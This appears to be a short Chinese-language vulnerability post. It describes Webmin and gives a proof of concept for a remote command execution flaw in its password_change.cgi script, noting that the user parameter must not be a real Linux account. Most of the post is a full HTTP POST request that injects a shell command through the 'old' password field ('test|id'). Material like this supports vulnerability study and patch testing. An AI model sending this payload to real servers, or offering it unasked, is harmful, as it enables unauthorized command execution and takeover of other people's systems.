Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin 远程命令执行漏洞

poc

只有在发送的user参数的值不是已知Linux用户的情况下(而一些参考中是user=root),才会进入到修改/etc/shadow的地方,触发命令注入漏洞。

  1. POST /password_change.cgi HTTP/1.1
  2. Host: your-ip:10000
  3. Accept-Encoding: gzip, deflate
  4. Accept: */*
  5. Accept-Language: en
  6. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  7. Connection: close
  8. Cookie: redirect=1; testing=1; sid=x; sessiontest=1
  9. Referer: https://your-ip:10000/session_login.cgi
  10. Content-Type: application/x-www-form-urlencoded
  11. Content-Length: 60
  13. user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2